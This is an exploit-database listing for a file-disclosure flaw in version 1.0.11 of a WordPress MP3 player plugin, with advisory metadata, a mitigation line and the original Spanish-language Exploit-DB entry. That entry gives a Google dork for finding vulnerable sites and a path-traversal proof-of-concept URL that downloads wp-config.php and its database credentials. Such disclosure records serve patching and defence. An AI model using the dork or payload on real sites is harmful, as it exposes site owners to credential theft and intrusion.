header-logo
Suggest Exploit
vendor:
Google MP3 Audio Player
by:
QK14 Team
7,5
CVSS
HIGH
File Disclosure Download
200
CWE
Product Name: Google MP3 Audio Player
Affected Version From: 1.0.11
Affected Version To: 1.0.11
Patch Exists: NO
Related CWE: N/A
CPE: a:codeart:google_mp3_audio_player:1.0.11
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2014

WordPress CodeArt Google MP3 Player plugin – File Disclosure Download

This plugin is vulnerable to File Disclosure Download. Thanks to this vulnerability, a user can download the configuration file config.php and extract from it the access data to the Database.

Mitigation:

Ensure that the application is not vulnerable to file disclosure attacks by validating user input and restricting access to sensitive files.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File
Disclosure Download

# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=

# Date: 02/12/2014

# Exploit Author: QK14 Team

# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/

# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/

# Version: 1.0.11

# http://wordpressa.quantika14.com/repository/index.php?id=14

 

Descripci�n:

 

Este plugin es vulnerable a File Disclosure Download.

Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de
configuraci�n config.php y extraer de �l los datos de acceso a la Base de
Datos.

 

POF:

localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php